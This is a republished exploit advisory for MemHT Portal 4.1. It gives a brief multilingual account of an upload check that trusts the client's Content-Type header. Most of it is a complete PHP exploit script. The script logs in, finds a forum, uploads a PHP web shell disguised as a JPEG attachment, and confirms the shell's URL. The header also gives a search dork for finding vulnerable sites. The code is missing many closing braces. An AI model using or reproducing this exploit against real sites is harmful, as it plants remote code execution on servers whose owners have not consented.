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MemHT Portal <= 4.1 Upload ByPass Vulnerabilities

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MemHT Portal <= 4.1 Upload ByPass Vulnerabilities

|				 _______         __                ______     							|
|				|    |  |.--.--.|  |--..-----.    |      |.----..-----..--.--.--.				|
|				|       ||  |  ||    < |  -__|    |   ---||   _||  -__||  |  |  |				|
|				|__|____||_____||__|__||_____|    |______||__|  |_____||________|				|
| Name: MemHT Portal <= 4.1 Upload ByPass 											|
| Software: MemHT Portal <= 4.1													|
| Site: http://www.memht.com													|
| Download: http://www.memht.com/index.php?page=release&download=full								|
| Vulnerability: Upload ByPass													|
| Severity: high ( low / medium / high )											|
| Tested on: 4.1														|
| Dork: "MemHT Portal"														|
| Author: Lord-Anubis														|
| Contact: lord.anu bis4[at]gm ail[dot]com											|
| Date: 16.06.2010 ( dd.mm.yyyy )												|
| Site: http://lordanubis.altervista.org/											|
| Bug File: inc/class/uploadFile.class.php											|
| 217.	function checkMime() {													|
| 218.		if (sizeof($this->mime) AND !@in_array($this->FILES[$this->field]['type'],$this->mime)) {			|
| 219.			$this->error = _ERROR_FILENOTPERMITTED_;								|
| 220.		}														|
| 221.	}															|
| Bug Explanation:														|
|	- EN:	In the file inc/class/uploadFile.class.php the control on the file's type uploaded,  happens checking  if the	|
|		"Content-Type" sended between the  header is on the array $this->mime. Therefore it's possible execute the	|
|		upload of a PHP file,simply sending the header "Content-Type: image/jpeg\r\n".					|
|	////////////////////////////////////////////////////////////////////////////////////////////////////////////////////	|
|	- ITA:	Nel file inc/class/uploadFile.class.php il controllo sul tipo di file caricato avviene verificando se il	|
|		"Content-Type" inviato tramite header и presente nell'array $this->mime. E' quindi possibile effettuare		|
|		l'upload di un file PHP inviando, semplicemente, l'header "Content-Type: image/jpeg\r\n".			|
|	////////////////////////////////////////////////////////////////////////////////////////////////////////////////////	|
|	- PL:	W pliku inc/class/uploadFile.class.php kontrol nad typem wniesionego file przeprowadza sie sprawdzajac		|
|		"Content-Type" przeslany przez header znajduje sie w array $this->mime. Jest mozliwe przeprowadzic upload file	|
|		PHP, wprowadzajac po prostu header "Content-Type: image/jpeg\r\n".						|
| Exploit:															|
 * exploit.php
 * Software: MemHT Portal <= 4.1
 * Author: Lord-Anubis <lord.anu bis4[at]gm ail[dot]com>
 * Vulnerability: Upload ByPass

ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 5);

function sendPacket($packet) {
	global $hostName;
	if (!$sock = fsockopen(gethostbyname($hostName), 80)) {
		exit("[-] No response from '{$hostName}'\n");

	fputs($sock, $packet);
	while (!feof($sock)) {
		$html .= fgets($sock);
	return $html;

function randomNum() {
	for ($i = 0; $i < 15; $i++) {
		$rand .= rand(0, 9);
	return $rand;

function phpCode() {
	return	"<form method=\"post\" action=\"<?php echo \"?\$_SERVER[QUERY_STRING]\"; ?>\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"upload\" /><input type=\"submit\" name=\"submit\" value=\"submit\" /></form>".
		"<?php error_reporting(0); set_time_limit(0); \$link = dirname(__FILE__) . DIRECTORY_SEPARATOR . \$_FILES['upload']['name'];".
		"if (move_uploaded_file(\$_FILES['upload']['tmp_name'], \$link)) { echo \$link; chmod(\$link, 0666); } else { echo \"Error uploading. ( by Lord-Anubis )\"; } ?>";

if ($argc != 5) {
		"[+] Software: MemHT Portal <= 4.1\n".
		"[+] Author: Lord-Anubis\n".
		"[+] Vulnerability: Upload ByPass\n".
		"[+] Usage: ./exploit [hostName] [path] [userName] [passWord]\n".
		"[+] Example:\n".
		"[+] ./exploit / anubis password\n".
		"[+] ./exploit hostname.com /wowbb/ mark s3cret\n"

list($cli, $hostName, $path, $userName, $passWord) = $argv;

if (substr($path, 0, 1) != "/")	{ $path = "/$path"; }
if (substr($path, -1) != "/")	{ $path = "$path/"; }

$postData = "post_username={$userName}&post_password={$passWord}&Submit=Login&login=true";
$packet   = "POST http://{$hostName}{$path}index.php?page=users HTTP/1.1\r\n";
$packet  .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet  .= "Host: {$hostName}\r\n";
$packet  .= "Content-Length: ".strlen($postData)."\r\n";
$packet	 .= "Referer: http://{$hostName}{$path}\r\n\r\n";
$packet  .= $postData;
$return   = sendPacket($packet);

preg_match('/login\_user\=(.*?)\;/is',	$return, $return1);
preg_match('/PHPSESSID\=(.*?)\;/is',	$return, $return2);
$cookie	 = $return1[1];
$session = $return2[1];

if ($cookie == 'deleted') {
	echo("[-] UserName or Password is invalid\n");
	echo("[-] Exploit failed\n");

for (;;) {
	if (empty($fid)) {
		$fid = 1;
	if ($fid > 100) {
		echo("[-] Forum is disbled\n");
		echo("[-] Exploit failed\n");
	if (preg_match('/class\=\'forum_legend\'/is', file_get_contents("http://{$hostName}{$path}index.php?page=forum&op=viewForum&id={$fid}"))) {
	$fid = $fid + 1;

$boundary = randomNum();
$fileName = randomNum();

$postArray = array(
	"name"		=> "Hello Wolrd!!!",
	"text"		=> "My name is Mark, i'm from 23 years old and i'm from US.",
	"tags"		=> "",
	"attachment"	=> phpCode(),
	"smiles"	=> "1",
	"notification"	=> "0",
	"Send"		=> "Send",
	"ok"		=> "true",

$postData = "";
foreach ($postArray as $key => $value) {
	$postData .= "-----------------------------{$boundary}\r\n";
	$postData .= "Content-Disposition: form-data; name=\"{$key}\"".($key === 'attachment' ? "; filename=\"{$fileName}.php\"" : "")."\r\n";
	$postData .= ($key === 'attachment' ? "Content-Type: image/jpeg\r\n" : "");
	$postData .= "\r\n";
	$postData .= "{$value}\r\n";

$postData .= "-----------------------------{$boundary}--\r\n";
$packet    = "POST http://{$hostName}{$path}index.php?page=forum&op=newThread&id={$fid} HTTP/1.1\r\n";
$packet   .= "Accept: image/gif, image/pjpeg, image/jpeg, image/png, image/tiff, image/bmp */*\r\n";
$packet	  .= "Referer: http://{$hostName}{$path}\r\n";
$packet   .= "Content-Type: multipart/form-data; boundary=---------------------------{$boundary}\r\n";
$packet   .= "Host: {$hostName}\r\n";
$packet   .= "Content-Length: ".strlen($postData)."\r\n";
$packet   .= "Cookie: PHPSESSID={$session}; login_user={$cookie};\r\n";
$packet   .= "Connection: Close\r\n\r\n";
$packet   .= $postData;

if (!preg_match('/Lord\-Anubis/is', file_get_contents("http://{$hostName}{$path}pages/forum/attachment/{$fileName}.php"))) {
	echo("[-] Attachment not found\n");
	echo("[-] Exploit failed\n");

echo("[+] http://{$hostName}{$path}pages/forum/attachment/{$fileName}.php\n");
echo("[+] Exploit successfull\n");

#  0day.today [2024-10-05]  #